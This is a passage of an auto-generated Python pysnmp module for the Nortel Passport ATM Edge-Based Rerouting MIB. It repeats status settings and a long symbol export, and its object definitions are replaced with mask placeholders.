mscAtmIfIispEbrOperEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')\n<mask token>\nif 
mibBuilder.loadTexts:\n mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrStatsTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrStatsEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrComponentName.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrStorageType.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrIndex.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrProvTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrOperTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n 
mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrIndex.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n 
mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrComponentName.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrStorageType.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrIndex.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrProvTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrOperTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n 
mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n 
mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrRowStatus.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrComponentName.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStorageType.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrIndex.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrProvTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrProvEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrOperTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrOperEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n 
mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStatsTable.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')\n<mask token>\nif mibBuilder.loadTexts:\n mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')\n<mask token>\nmibBuilder.exportSymbols('Nortel-MsCarrier-MscPassport-AtmEbrMIB',\n mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA,\n mscAtmIfUniEbrTotalConnectionRecoveries=\n mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=\n mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=\n mscAtmIfVptPnniEbrProvEntry,\n mscAtmIfVptVccEbrInfoTotalPathOptimizations=\n mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=\n mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=\n mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup,\n mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery,\n mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry,\n mscAtmIfVptUniEbrTotalPathOptimizations=\n mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=\n mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr,\n mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization,\n mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry,\n mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType,\n mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus,\n mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable,\n mscAtmIfVptPnniEbrSubscribedConnections=\n mscAtmIfVptPnniEbrSubscribedConnections,\n mscAtmIfVccEbrInfoTotalPathOptimizations=\n 
mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=\n mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=\n mscAtmIfVptUniEbrProvEntry,\n mscAtmIfVptPnniEbrEligibleRecoveredConnections=\n mscAtmIfVptPnniEbrEligibleRecoveredConnections,\n mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName,\n mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry,\n mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex,\n mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType,\n mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable,\n mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization,\n mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry,\n mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry,\n mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType,\n mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry,\n mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,\n mscAtmIfPnniEbrTotalConnectionRecoveries=\n mscAtmIfPnniEbrTotalConnectionRecoveries,\n mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,\n mscAtmIfPnniEbrEligibleRecoveredConnections=\n mscAtmIfPnniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoRecoverySubscribed=\n mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=\n mscAtmIfVptVccSrcEbrOvProvTable,\n mscAtmIfVptVccEbrInfoConnectionRecovered=\n mscAtmIfVptVccEbrInfoConnectionRecovered,\n mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,\n mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,\n mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,\n mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,\n mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,\n mscAtmIfVptIispEbrTotalPathOptimizations=\n mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=\n mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,\n mscAtmIfVptUniEbrIneligibleRecoveredConnections=\n 
mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02\n =atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=\n mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=\n mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=\n mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=\n mscAtmIfVpcSrcEbrOvOptimizationSubscribed,\n mscAtmIfIispEbrTotalPathOptimizations=\n mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName\n =mscAtmIfVccSrcEbrOvComponentName,\n mscAtmIfVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=\n mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=\n mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=\n mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=\n mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=\n mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=\n mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=\n mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=\n mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=\n mscAtmIfIispEbrRowStatusEntry,\n mscAtmIfVptIispEbrIneligibleRecoveredConnections=\n mscAtmIfVptIispEbrIneligibleRecoveredConnections,\n atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,\n mscAtmIfVptVccEbrInfoOptimizationSubscribed=\n mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=\n mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=\n mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=\n mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=\n mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=\n mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=\n mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=\n mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=\n mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=\n mscAtmIfVptUniEbrOperEntry, 
mscAtmIfVccEbrInfoRecoverySubscribed=\n mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=\n mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=\n mscAtmIfPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections=\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoConnectionRecovered=\n mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=\n mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=\n mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=\n mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations\n =mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=\n mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=\n mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=\n mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=\n mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=\n mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,\n mscAtmIfVptUniEbrTotalConnectionRecoveries=\n mscAtmIfVptUniEbrTotalConnectionRecoveries,\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries=\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries,\n mscAtmIfVptVccSrcEbrOvRowStatusEntry=\n mscAtmIfVptVccSrcEbrOvRowStatusEntry,\n mscAtmIfIispEbrTotalConnectionRecoveries=\n mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=\n mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=\n mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=\n mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=\n mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=\n mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=\n mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=\n mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=\n mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=\n 
mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=\n mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=\n mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=\n mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=\n mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=\n mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry\n =mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=\n mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=\n mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=\n mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=\n mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=\n mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=\n mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=\n mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,\n mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,\n mscAtmIfVptPnniEbrTotalConnectionRecoveries=\n mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=\n mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=\n mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=\n mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=\n mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=\n mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=\n mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=\n mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=\n mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=\n mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=\n mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=\n mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=\n mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=\n mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=\n mscAtmIfVptVccSrcEbrOvComponentName,\n 
mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,\n mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,\n mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,\n mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,\n mscAtmIfUniEbrEligibleRecoveredConnections=\n mscAtmIfUniEbrEligibleRecoveredConnections,\n mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,\n mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,\n mscAtmIfIispEbrEligibleRecoveredConnections=\n mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=\n mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=\n mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=\n mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=\n mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=\n mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=\n mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=\n mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=\n mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=\n mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=\n mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=\n mscAtmIfPnniEbrConnectionRecovery,\n mscAtmIfVccEbrInfoConnectionRecovered=\n mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=\n mscAtmIfVccEbrInfoStatsEntry,\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,\n mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,\n mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,\n mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,\n mscAtmIfVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=\n atmEbrCapabilities, mscAtmIfUniEbrComponentName=\n mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=\n mscAtmIfPnniEbrTotalPathOptimizations,\n mscAtmIfUniEbrIneligibleRecoveredConnections=\n 
mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=\n mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=\n mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=\n mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=\n mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=\n mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=\n mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=\n mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=\n mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,\n mscAtmIfVccEbrInfoOptimizationSubscribed=\n mscAtmIfVccEbrInfoOptimizationSubscribed,\n mscAtmIfVptVccSrcEbrOvRowStatusTable=\n mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,\n mscAtmIfVptVccEbrInfoRecoverySubscribed=\n mscAtmIfVptVccEbrInfoRecoverySubscribed,\n mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,\n mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,\n mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,\n mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,\n mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,\n mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,\n mscAtmIfIispEbrIneligibleRecoveredConnections=\n mscAtmIfIispEbrIneligibleRecoveredConnections,\n mscAtmIfVptIispEbrConnectionRecovery=\n mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=\n mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,\n mscAtmIfVptIispEbrTotalConnectionRecoveries=\n mscAtmIfVptIispEbrTotalConnectionRecoveries,\n 